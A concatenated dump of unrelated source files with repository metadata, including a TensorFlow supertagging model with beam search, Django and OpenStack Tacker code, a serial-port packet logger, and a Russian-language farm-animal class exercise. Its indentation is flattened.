#prev_init = [tf.zeros([2*self.opts.num_layers, batch_size, self.opts.units]), tf.zeros([batch_size], tf.int32), 0, tf.zeros([batch_size, self.loader.nb_tags])]
prev_init = [tf.zeros([batch_size], tf.int32), tf.zeros([batch_size, self.loader.nb_tags])]
## We need the following memory states (list of four elements):
## 1. Previous predictions (stag_idx): [batch_size]
## 2. In addition, though it's not a memory state, we also add projected_outputs for calculation of loss: [batch_size, outputs_dim]
## Define all the necessary weights for recursion
self.add_stag_embedding_mat()
self.add_stag_dropout_mat(batch_size)
##
all_states = tf.scan(lambda prev, x: self.add_one_crf(prev, x), crf_inputs, prev_init)
all_predictions = all_states[0] # [seq_len, batch_size]
all_predictions = tf.transpose(all_predictions, perm=[1, 0]) # [batch_size, seq_len]
all_projected_outputs = all_states[1] # [seq_len, batch_size, outputs_dim]
all_projected_outputs = tf.transpose(all_projected_outputs, perm=[1, 0, 2]) # [batch_size, seq_len, outputs_dim]
return all_predictions, all_projected_outputs
def add_one_crf(self, prev_list, crf_inputs):
## crf_inputs [batch_size, lm]
prev_predictions = prev_list[0]
crf_weights = self.add_stag_embedding(prev_predictions) ## [batch_size, lm, lm+1]
crf_outputs = crf(crf_inputs, crf_weights) ## [batch_size, lm]
projected_outputs = self.add_final_projection(crf_outputs)
predictions = self.add_predictions(projected_outputs) ## [batch_sizes]
new_state = [predictions, projected_outputs]
return new_state
def add_predictions(self, output):
predictions = tf.cast(tf.argmax(output, 1), tf.int32) ## [batch_size, nb_tags] -> [batch_size]
return predictions
def add_lm_accuracy(self):
correct_predictions = self.weight*tf.cast(tf.equal(self.predictions, self.inputs_placeholder_dict['tags']), tf.float32)
self.accuracy = tf.reduce_sum(tf.cast(correct_predictions, tf.float32))/tf.reduce_sum(tf.cast(self.weight, tf.float32))
def add_top_k(self, output, prev_scores, beam_size, post_first):
output = tf.nn.log_softmax(output) + prev_scores ## post_first: [batch_size (self.batch_size*beam_size), nb_tags], first iteration: [self.batch_size, nb_tags]
if post_first:
output = tf.reshape(output, [tf.shape(output)[0]/beam_size, self.loader.nb_tags*beam_size])
scores, indices = tf.nn.top_k(output, k=beam_size) ## [self.batch_size, beam_size], [self.batch_size, beam_size]
return scores, indices
## Supertagging
## Beware of the following notation: batch_size = self.batch_size*beam_size
def add_forward_beam_path(self, forward_inputs_tensor, backward_embeddings, beam_size):
batch_size = tf.shape(forward_inputs_tensor)[1] ## batch_size = self.batch_size = b
prev_init = [tf.zeros([2, batch_size, self.opts.num_layers*self.opts.units]), tf.zeros([batch_size], tf.int32), 0, tf.zeros([batch_size, 1]), tf.zeros([batch_size], tf.int32)]
## We need the following memory states (list of four elements):
## 1. LSTM cell and h memories for each layer: [2, batch_size, units*num_layers]
## 2. Previous predictions (stag_idx): [batch_size] ## notice the difference between beam and greedy here
## 3. Time step for referencing backward path: int
## 4. For beam search, we also need to memorize scores: [batch_size]
## 5. Backpointer (Parent indices) for predictions
name = 'Forward'
## Define all the necessary weights for recursion
lstm_weights_list = []
for i in xrange(self.opts.num_layers):
if i == 0:
inputs_dim = self.inputs_dim + self.opts.lm
else:
inputs_dim = self.opts.units
lstm_weights_list.append(get_lstm_weights('{}_LSTM_layer{}'.format(name, i), inputs_dim, self.opts.units, batch_size, self.hidden_prob, beam_size))
self.add_stag_embedding_mat()
#self.add_stag_dropout_mat(batch_size) ## unnecessary since we are only testing
## First Iteration has only self.batch_size configurations. For the sake of tf.scan function, calculate the first.
first_inputs = tf.squeeze(tf.slice(forward_inputs_tensor, [0, 0, 0], [1, -1, -1]), axis=0) ## [batch_size, inputs_dim+lm]
forward_inputs_tensor = tf.slice(forward_inputs_tensor, [1, 0, 0], [-1, -1, -1])
prev_init = self.add_one_beam_forward(prev_init, first_inputs, lstm_weights_list, backward_embeddings, beam_size, batch_size)
first_predictions = tf.expand_dims(prev_init[1], 0) ## [1, batch_size]
first_scores = tf.expand_dims(prev_init[3], 0) ## [1, batch_size, 1]
## Now, move on to the second iteration and beyond
initial_shape = tf.shape(forward_inputs_tensor)
forward_inputs_tensor = tf.reshape(tf.tile(forward_inputs_tensor, [1, 1, beam_size]), [initial_shape[0], initial_shape[1]*beam_size, initial_shape[2]])
## [seq_len-1, self.batch_size, inputs_dim] -> [seq_len-1, self.batch_size*beam_size (B*b), inputs_dim]
batch_size = initial_shape[1]*beam_size ## Bb
all_states = tf.scan(lambda prev, x: self.add_one_beam_forward(prev, x, lstm_weights_list, backward_embeddings, beam_size, batch_size, True), forward_inputs_tensor, prev_init, back_prop=False) ## no backprop for testing reuse projection weights from the first iteration
back_pointers = all_states[4] # [seq_len-1, batch_size]
back_pointers = tf.transpose(back_pointers, perm=[1, 0])
all_predictions = all_states[1] # [seq_len-1, batch_size]
all_predictions = tf.concat([first_predictions, all_predictions], 0)
all_predictions = tf.transpose(all_predictions, perm=[1, 0]) # [batch_size, seq_len]
all_scores = all_states[3] # [seq_len-1, batch_size, 1]
all_scores = tf.concat([first_scores, all_scores], 0)
all_scores = tf.squeeze(all_scores, axis=2)
all_scores = tf.transpose(all_scores, perm=[1, 0])
return all_predictions, all_scores, back_pointers
def add_one_beam_forward(self, prev_list, x, lstm_weights_list, backward_embeddings, beam_size, batch_size, post_first=False):
## compute one word in the forward direction
prev_cell_hiddens = prev_list[0] ## [2, batch_size, units*num_layers]
prev_cell_hidden_list = tf.split(prev_cell_hiddens, self.opts.num_layers, axis=2) ## [[2, batch_size, units] x num_layers]
prev_predictions = prev_list[1] ## [batch_size]
time_step = prev_list[2] ## 0D
prev_scores = prev_list[3] ## [batch_size (self.batch_size*beam_size), 1]
prev_embedding = self.add_stag_embedding(prev_predictions) ## [batch_size, inputs_dim]
#prev_embedding = prev_embedding*self.stag_dropout_mat
h = tf.concat([x, prev_embedding], 1) ## [batch_size, inputs_dim + lm]
cell_hiddens = []
for i in xrange(self.opts.num_layers):
weights = lstm_weights_list[i]
cell_hidden = lstm(prev_cell_hidden_list[i], h, weights, post_first) ## [2, batch_size, units]
cell_hiddens.append(cell_hidden)
h = tf.unstack(cell_hidden, 2, axis=0)[1] ## [batch_size, units]
cell_hiddens = tf.concat(cell_hiddens, 2) ## [2, batch_size, units*num_layers]
with tf.device('/cpu:0'):
backward_h = tf.nn.embedding_lookup(backward_embeddings, time_step) ## [self.batch_size, units]
if post_first: ## batch_size = self.batch_size*beam_size
backward_h = tf.reshape(tf.tile(backward_h, [1, beam_size]), [batch_size, -1]) ## [batch_size, units]
bi_h = tf.concat([h, backward_h], 1) ## [batch_size, outputs_dim]
projected_outputs = self.add_projection(bi_h, post_first) ## [batch_size, nb_tags]
scores, indices = self.add_top_k(projected_outputs, prev_scores, beam_size, post_first) ## [self.batch_size, beam_size], [self.batch_size, beam_size]
scores = tf.stop_gradient(scores)
indices = tf.stop_gradient(indices)
predictions = indices % self.loader.nb_tags ##[b, B]
scores = tf.reshape(scores, [-1, 1]) ## [batch_size, 1]
predictions = tf.reshape(predictions, [-1]) ## [batch_size]
if post_first:
parent_indices = tf.reshape(tf.range(0, batch_size, beam_size), [-1, 1]) + indices//self.loader.nb_tags ## [self.batch_size, 1] + [self.batch_size, beam_size]
parent_indices = tf.reshape(parent_indices, [-1]) ## [self.batch_size*beam_size (batch_size)]
cell_hiddens = tf.transpose(cell_hiddens, [1, 0, 2]) ## [batch_size, 2, units*num_layers]
with tf.device('/cpu:0'):
cell_hiddens = tf.nn.embedding_lookup(cell_hiddens, parent_indices) ## [batch_size, 2, units*num_layers]
cell_hiddens = tf.transpose(cell_hiddens, [1, 0, 2]) ## [2, batch_size, units*num_layers]
else:
parent_indices = tf.zeros([batch_size*beam_size], tf.int32) ## Dummy parent indices for the first iteration. We know parents for the first iteration
cell_hiddens = tf.reshape(tf.tile(cell_hiddens, [1, 1, beam_size]), [2, batch_size*beam_size, -1])
time_step += 1
new_state = [cell_hiddens, predictions, time_step, scores, parent_indices]
return new_state
def run_batch(self, session, testmode = False):
if not testmode:
feed = {}
for feat in self.inputs_placeholder_dict.keys():
feed[self.inputs_placeholder_dict[feat]] = self.loader.inputs_train_batch[feat]
feed[self.keep_prob] = self.opts.dropout_p
feed[self.hidden_prob] = self.opts.hidden_p
feed[self.input_keep_prob] = self.opts.input_dp
train_op = self.train_op
_, loss, accuracy = session.run([train_op, self.loss, self.accuracy], feed_dict=feed)
return loss, accuracy
else:
feed = {}
for feat in self.inputs_placeholder_dict.keys():
feed[self.inputs_placeholder_dict[feat]] = self.loader.inputs_test_batch[feat]
feed[self.keep_prob] = 1.0
feed[self.hidden_prob] = 1.0
feed[self.input_keep_prob] = 1.0
if self.beam_size == 0:
loss, accuracy, predictions, weight = session.run([self.loss, self.accuracy, self.predictions, self.weight], feed_dict=feed)
weight = weight.astype(bool)
predictions = predictions[weight]
return loss, accuracy, predictions
else:
predictions, scores, weight_beam, weight, back_pointers = session.run([self.predictions, self.scores, self.weight_beam, self.weight, self.back_pointers], feed_dict=feed)
weight = weight.astype(bool)
weight_beam = weight_beam.astype(bool)
predictions, scores, indices = back_track(predictions, scores, back_pointers, weight_beam)
## predictions [batch_size, seq_len], scores [batch_size, seq_en], back_pointer [batch_size, seq_len-1]
b = predictions.shape[0]/self.beam_size
n = predictions.shape[1]
predictions = predictions.reshape([b, -1])[:, :n]
## [bB, n] => [b, Bn]
predictions = predictions[weight]
scores = scores[weight_beam]
return predictions, scores
def run_epoch(self, session, testmode = False):
if not testmode:
epoch_start_time = time.time()
next_batch = self.loader.next_batch
epoch_incomplete = next_batch(self.batch_size)
## debug
#count = 0
while epoch_incomplete:
#count += 1
loss, accuracy = self.run_batch(session)
print('{}/{}, loss {:.4f}, accuracy {:.4f}'.format(self.loader._index_in_epoch, self.loader.nb_train_samples, loss, accuracy), end = '\r')
epoch_incomplete = next_batch(self.batch_size)
#if count == 100 and self.opts.model in ['Stagging_Model_Global_LM']:
# break
print('\nEpoch Training Time {}'.format(time.time() - epoch_start_time))
return loss, accuracy
elif self.beam_size == 0:
next_test_batch = self.loader.next_test_batch
test_incomplete = next_test_batch(self.batch_size)
predictions = []
while test_incomplete:
loss, accuracy, predictions_batch = self.run_batch(session, True)
predictions.append(predictions_batch)
print('Testmode {}/{}, loss {}, accuracy {}'.format(self.loader._index_in_test, self.loader.nb_validation_samples, loss, accuracy), end = '\r')
test_incomplete = next_test_batch(self.batch_size)
predictions = np.hstack(predictions)
if self.test_opts is not None:
self.loader.output_stags(predictions, self.test_opts.save_tags)
# if self.test_opts is not None:
# if self.test_opts.save_tags:
# self.loader.output_stags(predictions, 'greedy_stags.txt')
accuracy = np.mean(predictions == self.loader.test_gold)
return accuracy
else:
next_test_batch = self.loader.next_test_batch
test_incomplete = next_test_batch(self.batch_size)
predictions = []
scores = []
while test_incomplete:
predictions_batch, scores_batch = self.run_batch(session, True)
predictions.append(predictions_batch)
scores.append(scores_batch)
print('Testmode {}/{}'.format(self.loader._index_in_test, self.loader.nb_validation_samples), end = '\r')
test_incomplete = next_test_batch(self.batch_size)
predictions = np.hstack(predictions)
scores = np.hstack(scores)
if self.test_opts is not None:
self.loader.output_stags(predictions, self.test_opts.save_tags)
# if self.test_opts is not None:
#if self.test_opts.save_tags:
# self.loader.output_stags(predictions, '{}best_stags.txt'.format(self.beam_size), self.beam_size)
# self.loader.output_scores(scores, '{}best_scores.txt'.format(self.beam_size), self.beam_size)
# #with open('{}best_scores.txt'.format(self.beam_size), 'wt') as fhand:
accuracy = np.mean(predictions == self.loader.test_gold)
return accuracy
def __init__(self, opts, test_opts=None, beam_size=0):
## Notation:
## b: batch_size
## d: # units
## n: # tokens in the sentence
## B: beam_size
self.opts = opts
self.test_opts = test_opts
self.loader = Dataset(opts, test_opts)
self.batch_size = opts.batch_size
self.beam_size = beam_size
print('beam')
print(beam_size)
self.get_features()
self.add_placeholders()
self.inputs_dim = self.opts.embedding_dim + self.opts.suffix_dim + self.opts.cap + self.opts.num + self.opts.jk_dim + self.opts.nb_filters
self.outputs_dim = (1+self.opts.bi)*self.opts.units
inputs_list = [self.add_word_embedding()]
if self.opts.suffix_dim > 0:
inputs_list.append(self.add_suffix_embedding())
if self.opts.cap:
inputs_list.append(self.add_cap())
if self.opts.num:
inputs_list.append(self.add_num())
if self.opts.jk_dim > 0:
inputs_list.append(self.add_jackknife_embedding())
if self.opts.chars_dim > 0:
inputs_list.append(self.add_char_embedding())
inputs_tensor = tf.concat(inputs_list, 2) ## [seq_len, batch_size, inputs_dim]
forward_inputs_tensor = self.add_dropout(inputs_tensor, self.input_keep_prob)
for i in xrange(self.opts.num_layers):
forward_inputs_tensor = self.add_dropout(self.add_lstm(forward_inputs_tensor, i, 'Forward'), self.keep_prob) ## [seq_len, batch_size, units]
lstm_outputs = forward_inputs_tensor
if self.opts.bi:
backward_inputs_tensor = self.add_dropout(tf.reverse(inputs_tensor, [0]), self.input_keep_prob)
for i in xrange(self.opts.num_layers):
backward_inputs_tensor = self.add_dropout(self.add_lstm(backward_inputs_tensor, i, 'Backward'), self.keep_prob) ## [seq_len, batch_size, units]
backward_inputs_tensor = tf.reverse(backward_inputs_tensor, [0])
lstm_outputs = tf.concat([lstm_outputs, backward_inputs_tensor], 2) ## [seq_len, batch_size, outputs_dim]
crf_inputs = tf.map_fn(lambda x: self.feed_to_crf(x), lstm_outputs) ## [seq_len, batch_size, outputs_dim] => [seq_len, batch_size, lm]
crf_inputs = self.add_dropout(crf_inputs, self.keep_prob)
# if beam_size > 0:
# self.predictions, self.scores, self.back_pointers = self.add_forward_beam_path(forward_inputs_tensor, backward_inputs_tensor, beam_size) ## [seq_len, batch_size, nb_tags]
# self.weight = tf.not_equal(self.inputs_placeholder_dict['words'], tf.zeros(tf.shape(self.inputs_placeholder_dict['words']), tf.int32)) # [self.batch_size, seq_len]
# self.weight_beam = tf.reshape(tf.tile(self.weight, [1, beam_size]), [-1, tf.shape(self.weight)[1]]) # [batch_size, seq_len]
# else:
self.predictions, projected_outputs = self.add_crf_path(crf_inputs) ## [seq_len, batch_size, nb_tags]
self.weight = tf.cast(tf.not_equal(self.inputs_placeholder_dict['words'], tf.zeros(tf.shape(self.inputs_placeholder_dict['words']), tf.int32)), tf.float32) ## [batch_size, seq_len]
self.add_lm_accuracy()
self.loss = self.add_loss_op(projected_outputs)
self.train_op = self.add_train_op(self.loss)
# if self.opts.bi:
| [
"jk964@grace2.grace.hpc.yale.internal"
] | jk964@grace2.grace.hpc.yale.internal |
99cf90937f26242723ce9817ba1a0ba687d0864c | 41ede4fd3bfba1bff0166bca7aee80dcf21434c6 | /tribunal2000/unknown-horizons/actions.py | 668b299c96b7013c054a25541f0038050a242f19 | [] | no_license | pisilinux/playground | a7db4b42559a21cc72fd4c8649e0231ab6a3eb3c | e4e12fff8a847ba210befc8db7e2af8556c3adf7 | refs/heads/master | 2022-08-12T23:03:27.609506 | 2022-08-11T18:28:19 | 2022-08-11T18:28:19 | 8,429,459 | 16 | 22 | null | 2022-08-11T18:28:20 | 2013-02-26T09:37:11 | Python | UTF-8 | Python | false | false | 428 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/licenses/gpl.txt
from pisi.actionsapi import pythonmodules
from pisi.actionsapi import pisitools
def build():
pythonmodules.compile ()
def install():
pythonmodules.install ()
pythonmodules.fixCompiledPy("/usr/share/unknown-horizons")
pisitools.dodoc ("README")
| [
"tribunal2000@gmail.com"
] | tribunal2000@gmail.com |
32bed2fafc640ee40636dad7d92a4522dcdd35a9 | 0d5241c847506383cc9b6302fb84bcf95f6c7350 | /tx_test.py | c711ad6e4d69584cf661c77e4146e72ea63e3499 | [] | no_license | aedra/recuperator | 80e51f2c520b8c9a55c86942f8525789bfedf5ba | 34839112d5515a04844e3dd230af57b7cec96fa9 | refs/heads/master | 2016-09-06T16:52:48.126389 | 2014-12-15T01:10:55 | 2014-12-15T01:10:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,318 | py | import serial
from datetime import datetime, date, time
import time
def check_checksum(tl):
ss = sum(tl[0:6]) & 0xFF
return (((~ss) & 0xFF)+1)&0xFF
def tx_packet(tvalues):
for val in tvalues:
port.write(chr((~val)&0xFF))
idx = 0
arr = ['0'] # for file I/O handling
val = [0] # for calculation
cks = 0
datestr = ['0']
tempRoom = [0]*8
tempSet = [0]*8
txarr = [181, 0, 7, 130, 1, 193]
# uart clock was adjusted from 3MHz to xxx to tweak the baud rate
# 4800bps has 5200bps in real measurement
port = serial.Serial("/dev/ttyAMA0", baudrate=2400, timeout=1.0)
fo = open("packetlog-recuperator.txt","w")
print >> fo, "Date", "Time", "Byte0", "Byte1", "Byte2", "Byte3", "Byte4", "Byte5", "Byte6"
cd = datetime.now()
while True:
# read 1byte from serial port and store it into packet array
t0 = time.time()
tbyte = port.read(1)
rcv = str((~ord(tbyte))&0xFF)
t1 = time.time()
if t1-t0 > 0.05:
cmdset = ' '.join(arr)
print arr
if len(arr) > 4:
if arr[0]=='213':
time.sleep(0.11)
tx_packet(txarr)
print >> fo, cd, cmdset
# initialize variables
idx = 0
arr = ['0']
arr[0] = rcv
val = [0]
val[0] = int(rcv)
cd = datetime.now()
# compare checksum
# place command parsing and functions for each commands
else:
arr.append(rcv)
val.append(int(rcv))
idx +=1
fo.close() | [
"blueskul73@gmail.com"
] | blueskul73@gmail.com |
ebb48da0afb3cc3a6e84d07dc054e6bed724ced7 | e9980c7c608d2098a6e7c4e858a5909196759f30 | /contact/forms.py | 6d2db357482691e3421e03d841a9d5f4073295a3 | [] | no_license | saurabhgharat/django-portfolio | b906b2b5fcd833cae6ba007277edd54e092d8d86 | 1e2b2d9b168932c67e85198f9f9db4cf41a21431 | refs/heads/master | 2020-03-26T17:16:37.063718 | 2018-08-17T18:09:04 | 2018-08-17T18:09:04 | 144,604,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | from django import forms
from contact.models import Contact
class ContactForm(forms.ModelForm):
class Meta:
model = Contact
fields = ['name', 'sender', 'message', ]
| [
"saurabhhgharat9@gmail.com"
] | saurabhhgharat9@gmail.com |
7fe4ba0f5ad62a80601a216373746ad51ac9e09f | 2e00398c4b77ab6e1996dbbefa167e13a8ad40a9 | /products/urls.py | fab0250699fb90757ba44b5592f3d12ac5e94b7e | [] | no_license | cleliofavoccia/PurBeurre | d754b83ed28b1240447243f149080058a60ccdfb | e2b5a51fbd91412e68ddb1c3c785713c7988cc41 | refs/heads/main | 2023-03-20T11:06:32.466520 | 2021-03-12T16:02:22 | 2021-03-12T16:02:22 | 331,650,830 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | """URLS of products app"""
from django.urls import path
from . import views
app_name = 'products'
urlpatterns = [
path('<int:pk>/', views.ProductDetailView.as_view(), name='product'),
path('results/', views.ResultsListView.as_view(), name='results')
]
| [
"favoccia.c@live.fr"
] | favoccia.c@live.fr |
85f15b7422e7ba1436915672b9b7d3691003d04d | aee26a4c731a84481a499679c3d4cef9ec954aed | /tacker/sol_refactored/objects/v2/vnfc_snapshot_info.py | 3d495eaac1a58e1b7d9459884ff6691aa47c8f26 | [
"Apache-2.0"
] | permissive | openstack/tacker | 6976cbee3afadfd9390849b56da2837feb93e912 | 9c7918f0b501cdeaffae40f585b76fc92b8e196e | refs/heads/master | 2023-09-04T01:22:43.106241 | 2023-08-31T00:06:42 | 2023-08-31T00:42:20 | 21,259,951 | 125 | 172 | Apache-2.0 | 2021-05-09T06:13:08 | 2014-06-27T01:11:56 | Python | UTF-8 | Python | false | false | 2,018 | py | # Copyright (C) 2021 Nippon Telegraph and Telephone Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tacker.sol_refactored.objects import base
from tacker.sol_refactored.objects import fields
# NFV-SOL 003
# - v3.3.1 5.5.3.19 (API version: 2.0.0)
@base.TackerObjectRegistry.register
class VnfcSnapshotInfoV2(base.TackerObject, base.TackerObjectDictCompat):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'id': fields.StringField(nullable=False),
'vnfcInstanceId': fields.StringField(nullable=False),
'creationStartedAt': fields.DateTimeField(nullable=False),
'creationFinishedAt': fields.DateTimeField(nullable=True),
'vnfcResourceInfoId': fields.StringField(nullable=False),
'computeSnapshotResource': fields.ObjectField(
'ResourceHandle', nullable=True),
'storageSnapshotResources': fields.ListOfObjectsField(
'VnfcSnapshotInfoV2_StorageSnapshotResources', nullable=True),
'userDefinedData': fields.KeyValuePairsField(nullable=True),
}
class VnfcSnapshotInfoV2_StorageSnapshotResources(base.TackerObject,
base.TackerObjectDictCompat):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'storageResourceId': fields.StringField(nullable=False),
'storageSnapshotResource': fields.ObjectField(
'ResourceHandle', nullable=True),
}
| [
"oda@valinux.co.jp"
] | oda@valinux.co.jp |
fbeeb69869e38fdbd9ddce6c3e146eabf4d25971 | 664274cecab7846c8787af1bb105e6a3ba706905 | /server/apps/survey/management/commands/fix_questions.py | 74d591910849c36aee8aee50f84aa77fdfdc5646 | [
"MIT"
] | permissive | Ecotrust/south-coast | 99176f6e85901c622755c5cdd1255c9e255385ae | b225bd52abfd7c907fa7f8a97a3f2273c895c140 | refs/heads/master | 2020-04-29T09:40:40.444236 | 2013-10-05T00:52:30 | 2013-10-05T00:52:30 | 13,329,657 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,253 | py | from django.core.management.base import BaseCommand, CommandError
from survey.models import Question, Option, Block, Page
class Command(BaseCommand):
help = 'Save All Responses'
def handle(self, *args, **options):
colA = Option.objects.get(pk=1)
colB = Option.objects.get(pk=2)
for page in Page.objects.all():
page.blocks.clear()
page.save()
for question in Question.objects.all():
if question.page_set.all().count() == 0:
continue
if question.slug.find('lobster') != -1:
page = Page.objects.get(questions=question)
#page.blocks.clear()
page.blocks.add(Block.objects.get(name="Lobster Traps"))
page.save()
elif question.slug.find('fish-traps') != -1:
page = Page.objects.get(questions=question)
#page.blocks.clear()
page.blocks.add(Block.objects.get(name="Fish Traps"))
page.save()
elif question.slug.find('traps') != -1:
page = Page.objects.get(questions=question)
#page.blocks.clear()
page.blocks.add(Block.objects.get(name="Traps"))
page.save()
if question.slug.find('line') != -1:
page = Page.objects.get(questions=question)
#page.blocks.clear()
page.blocks.add(Block.objects.get(name="Line or Reel"))
page.save()
if question.slug.find('spear') != -1 or question.slug.find('dive') != -1:
page = Page.objects.get(questions=question)
#page.blocks.clear()
page.blocks.add(Block.objects.get(name="Spear or By Hand"))
page.save()
if question.slug.find('net') != -1:
page = Page.objects.get(questions=question)
#page.blocks.clear()
page.blocks.add(Block.objects.get(name="Nets"))
page.save()
if question.slug.endswith('st-thomas-st-john'):
page = Page.objects.get(questions=question)
#page.blocks.clear()
page.blocks.add(Block.objects.get(name="St. Thomas or St. John"))
page.save()
elif question.slug.endswith('st-croix'):
page = Page.objects.get(questions=question)
page.blocks.add(Block.objects.get(name="St. Croix"))
#page.blocks.clear()
page.save()
elif question.slug.endswith('st-thomas'):
page = Page.objects.get(questions=question)
#page.blocks.clear()
page.blocks.add(Block.objects.get(name="St. Thomas"))
page.save()
elif question.slug.endswith('st-john'):
page = Page.objects.get(questions=question)
#page.blocks.clear()
page.blocks.add(Block.objects.get(name="St. John"))
page.save()
if question.type == 'grid':
question.options.clear()
question.grid_cols.add(colA)
question.grid_cols.add(colB)
question.save() | [
"eknuth@ecotrust.org"
] | eknuth@ecotrust.org |
c46fbb67ddbe507605f8b0089f0fbf1056797377 | f21560416f2b2288ccff8beafbd6fd282af97919 | /FileReading.py | 62e87787c7d2d3492f43f71337cf0fd0c483fab2 | [] | no_license | sumanbobo2204/pythonstarter | b18fc981152c16f478880f977ceea7e444e7a10a | af895c75802d258c32099d07973db141290f51aa | refs/heads/master | 2020-04-14T23:38:04.889250 | 2019-01-18T17:53:57 | 2019-01-18T17:53:57 | 164,209,690 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | import glob, os
parent_dir = r"G:\Wedding_Pics\Taniya and Patla Potty\Wedding"
replace_string='G:\Wedding_Pics\Taniya and Patla Potty\Wedding\\'
rpl = 'DSC_'
rpl2 = '.JPG'
rpl3 = 'WG'
for img_file in glob.glob(os.path.join(parent_dir, '*.JPG')):
print(img_file.replace(replace_string, '').replace(rpl, '').replace(rpl2, '').replace(rpl3, ''))
| [
"noreply@github.com"
] | sumanbobo2204.noreply@github.com |
35f5bd01e47216d87cf160fb5e3b7c4cea456c3b | e5539ae038ab973df36848d741ce0cbd330c0214 | /schedules/templatetags/calendar_month.py | ebcefe9914a7337dd41cbae7c274e6f6b49bc68d | [
"MIT"
] | permissive | dvek/scyp | b6228578a97e797badbb987205669edf6d4ed957 | 0f70d6a9071edbf9e26b7cb3cfaea38905e192d1 | refs/heads/master | 2022-12-12T19:53:55.001276 | 2019-04-08T05:32:58 | 2019-04-08T05:32:58 | 139,801,087 | 0 | 0 | MIT | 2022-12-08T02:15:14 | 2018-07-05T05:55:31 | Python | UTF-8 | Python | false | false | 341 | py | from django import template
from django.utils import timezone
from schedules.services import get_times_from_day
from schedules.models import TimeOfDay
register = template.Library()
@register.inclusion_tag('templatetags/calendar_month.html')
def calendar_month():
variable = None
print(">>>>>>")
return {'variable': variable}
| [
"denieru@gmail.com"
] | denieru@gmail.com |
627be50c44abf932ba5760b7dc86169e001916ed | 57acc8b08f3ba4d0a8ca8c5d52b817bd38624a23 | /job3.5-ClassFerma/Class_Ferma.py | ded507639188946fc9238c7d07295175a8d10684 | [] | no_license | migachevalexey/Netology | 288c473d05e2351623a0dbfe606382f0fad54a27 | 24b084680d1f5cec939c563dbc4f9abb9ac493f6 | refs/heads/master | 2021-05-07T03:18:52.529787 | 2018-02-26T13:37:24 | 2018-02-26T13:37:24 | 93,773,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,861 | py | #https://github.com/bobrynya/netology5
class Animal:
state_animal = ['live', 'sick', 'dead']
def __init__(self, type_animal, name, state=state_animal[0]):
self.type_animal = type_animal
self.name = name
self.state = state # по сути оно не нужно. Атавизм
def change_state(self, n=True):
if not n:
self.state[self.state.index('sick')] = 'dead'
print('Умерла {} :-(. Осталось {}'.format(self.name))
elif n:
self.state = self.state_animal[1]
print(f'Заболела {self.name}. Надо вызвать ветеринара!')
def feed(self):
if self.type_animal == 'рогатые':
print('{}: корм сено'.format(self.name.title()))
elif self.type_animal == 'водоплавающие':
print('{}: корм зерно'.format(self.name.title()))
else:
print('Свиней кормим отходами')
def walk(self, time, duration):
print('Отправляем животных на прогулку в {0} {2} на {1} {2}'.format(time, duration, 'часов'))
class Animals(Animal):
"""
quant - колво животных в стаде
stado_state - тут состояние каждого животного в стаде
stado_state_vsego - общее сотсояние стада - list('live', 'sick', 'dead', 'mix')
"""
quant = 0
Animal.state_animal.append('mix')
stado_state = []
def __init__(self, type_animal, name, stado_state_vsego='live'):
self.stado_state_vsego = stado_state_vsego
super().__init__(type_animal, name)
def add(self, n):
self.quant += n
self.stado_state += [self.state] * n
print('Добавилось {}шт {}. Теперь их в стаде {}'.format(n, self.name, self.quant))
def kill(self, n):
# n - сколько забили. Их сразу увозят с фермы!
if self.quant >= n and self.stado_state.count('live') >= n:
self.quant -= n
for _ in range(n):
self.stado_state.remove('live')
print('Пришлось убить {}шт {} :-(. Кушать хочется. '
'Осталось {}шт. из них болееют {}'.format(n, self.name, self.quant, self.state.count('sick')))
else:
print('Столько({}шт) {} у нас просто нет. Их всего {}'.format(n, self.name, self.quant))
def change_state(self, n=True, m=1):
# n = False - умерло, True - заболело, m - колво для заболевших
# умереть может только больное животное
if not n and self.stado_state.count('sick') > 0:
self.stado_state[self.stado_state.index('sick')] = self.state_animal[2]
self.stado_state_vsego = 'mix'
print('Умерла {} (болела бедняга), ветеринар не успел :-(. '
'Здоровых осталось {}, больных {}'.format(self.name, self.stado_state.count('live'), self.stado_state.count('sick')))
elif not n and self.stado_state.count('sick') == 0:
print(
'Умертвить здоровое животное Нельзя, т.к. здоровое животное просто так умереть не может, а больных у нас нет!')
elif n: # заболело
for _ in range(m):
self.stado_state[self.stado_state.index('live')] = self.state_animal[1]
self.stado_state_vsego = 'mix'
print(f'Заболела {self.name} {m}шт. Итого у нас больных {self.stado_state.count(self.state_animal[1])}шт.',
end=' ')
if self.stado_state.count(self.state_animal[1]) < 3:
print('Надо бы вызвать ветеринара!')
elif self.stado_state.count(self.state_animal[1]) > 2:
print('СРОЧНО ВЫЗВАТЬ ВЕТЕРИНАРА!')
def navedem_poryadok(self):
self.quant = self.stado_state.count(self.state_animal[0]) + self.stado_state.count(self.state_animal[1])
self.stado_state.clear()
self.stado_state = [self.state_animal[0]] * self.quant
self.stado_state_vsego = 'live'
print('Приехал ветеринар, больных - вылечил, мертвых - забрал. '
'Итого у нас сейчас {} {}'.format(self.quant, self.name))
stado = Animals('рогатые', 'коза')
# print(stado.__dict__)
# print(Animal.state_animal)
# stado.add(5)
# stado.change_state()
# stado.feed()
# print(stado.stado_state)
# stado.add(3)
# stado.feed()
# stado.kill(2)
# stado.change_state(False)
# stado.change_state(1, 2)
# stado.navedem_poryadok()
class Goats(Animals):
product = 'milk'
kolvo_product = 10 # per unit
vsego_kolvo_product = 0
nadoi = 0
def __init__(self, type_animal='рогатые', name='коза'):
super().__init__(type_animal, name)
def feed(self, n, m):
# Подукцию дают только здоровые животные
super().walk(n, m)
